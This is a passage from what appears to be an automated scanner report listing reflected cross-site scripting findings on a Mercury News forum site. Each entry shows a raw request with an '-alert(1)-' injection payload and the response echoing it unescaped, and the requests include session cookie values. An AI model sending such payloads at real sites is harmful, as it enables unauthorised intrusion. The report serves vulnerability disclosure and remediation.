Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /topic/oil-price-and-iran-war

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 363f2"-alert(1)-"de8dec15453 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/oil-price-and-iran-war?363f2"-alert(1)-"de8dec15453=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:06:59 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:23 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 98092

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
(typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / topic/oil-price-and-iran-war?363f2"-alert(1)-"de8dec15453=1";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCi
...[SNIP]...

3.112. http://forums.mercurynews.com/topic/pentagon-cant-explain-missile-off-california [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /topic/pentagon-cant-explain-missile-off-california

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe5e4"-alert(1)-"7be3daf7363 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topicfe5e4"-alert(1)-"7be3daf7363/pentagon-cant-explain-missile-off-california HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:09 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:33 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
anguage="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / topicfe5e4"-alert(1)-"7be3daf7363/pentagon-cant-explain-missile-off-california";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURC
...[SNIP]...

3.113. http://forums.mercurynews.com/topic/pentagon-cant-explain-missile-off-california [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /topic/pentagon-cant-explain-missile-off-california

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64259"-alert(1)-"06154ffc603 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/pentagon-cant-explain-missile-off-california64259"-alert(1)-"06154ffc603 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:22 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:46 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
ned') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / topic/pentagon-cant-explain-missile-off-california64259"-alert(1)-"06154ffc603";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCiQu
...[SNIP]...

3.114. http://forums.mercurynews.com/topic/pentagon-cant-explain-missile-off-california [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /topic/pentagon-cant-explain-missile-off-california

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab401"-alert(1)-"0432824b438 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/pentagon-cant-explain-missile-off-california?ab401"-alert(1)-"0432824b438=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:07:03 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:27 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
ed') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / topic/pentagon-cant-explain-missile-off-california?ab401"-alert(1)-"0432824b438=1";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCi
...[SNIP]...

3.115. http://forums.mercurynews.com/topic/supreme-court-wont-halt-enforcement-of-dont-ask-dont-tell-policy [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /topic/supreme-court-wont-halt-enforcement-of-dont-ask-dont-tell-policy

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8d4a7"-alert(1)-"28a781fd586 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic8d4a7"-alert(1)-"28a781fd586/supreme-court-wont-halt-enforcement-of-dont-ask-dont-tell-policy HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:06:58 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:22 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22218

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
anguage="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / topic8d4a7"-alert(1)-"28a781fd586/supreme-court-wont-halt-enforcement-of-dont-ask-dont-tell-policy";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=get
...[SNIP]...

3.116. http://forums.mercurynews.com/topic/supreme-court-wont-halt-enforcement-of-dont-ask-dont-tell-policy [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /topic/supreme-court-wont-halt-enforcement-of-dont-ask-dont-tell-policy

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e3d4"-alert(1)-"47d584067f5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/supreme-court-wont-halt-enforcement-of-dont-ask-dont-tell-policy1e3d4"-alert(1)-"47d584067f5 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:07 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:31 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22218

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
"";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / topic/supreme-court-wont-halt-enforcement-of-dont-ask-dont-tell-policy1e3d4"-alert(1)-"47d584067f5";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCiQu
...[SNIP]...

3.117. http://forums.mercurynews.com/topic/supreme-court-wont-halt-enforcement-of-dont-ask-dont-tell-policy [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /topic/supreme-court-wont-halt-enforcement-of-dont-ask-dont-tell-policy

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20852"-alert(1)-"14a59680a3a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/supreme-court-wont-halt-enforcement-of-dont-ask-dont-tell-policy?20852"-alert(1)-"14a59680a3a=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:06:54 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:18 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23285

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / topic/supreme-court-wont-halt-enforcement-of-dont-ask-dont-tell-policy?20852"-alert(1)-"14a59680a3a=1";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCi
...[SNIP]...

3.118. http://forums.mercurynews.com/topic/war-crisis-in-september [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /topic/war-crisis-in-september

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4a503"-alert(1)-"208a5264286 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic4a503"-alert(1)-"208a5264286/war-crisis-in-september HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:27 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:51 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22136

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
anguage="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / topic4a503"-alert(1)-"208a5264286/war-crisis-in-september";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageN
...[SNIP]...

3.119. http://forums.mercurynews.com/topic/war-crisis-in-september [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /topic/war-crisis-in-september

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b33de"-alert(1)-"add33b46077 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/war-crisis-in-septemberb33de"-alert(1)-"add33b46077 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:33 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:57 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22136

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
(typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / topic/war-crisis-in-septemberb33de"-alert(1)-"add33b46077";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCiQu
...[SNIP]...

3.120. http://forums.mercurynews.com/topic/war-crisis-in-september [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /topic/war-crisis-in-september

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57abb"-alert(1)-"ea4b545c8c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/war-crisis-in-september?57abb"-alert(1)-"ea4b545c8c0=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:07:18 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:42 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 162532

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
(typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / topic/war-crisis-in-september?57abb"-alert(1)-"ea4b545c8c0=1";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCi
...[SNIP]...

3.121. http://forums.mercurynews.com/xml/comments [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /xml/comments

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34def"-alert(1)-"a6f704bab09 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /xml34def"-alert(1)-"a6f704bab09/comments HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:06:26 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:06:50 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22102

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
language="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / xml34def"-alert(1)-"a6f704bab09/comments";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaig
...[SNIP]...

3.122. http://forums.mercurynews.com/xml/comments [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /xml/comments

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df349"-alert(1)-"078e172cde1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /xml/commentsdf349"-alert(1)-"078e172cde1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:06:40 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:04 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22102

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
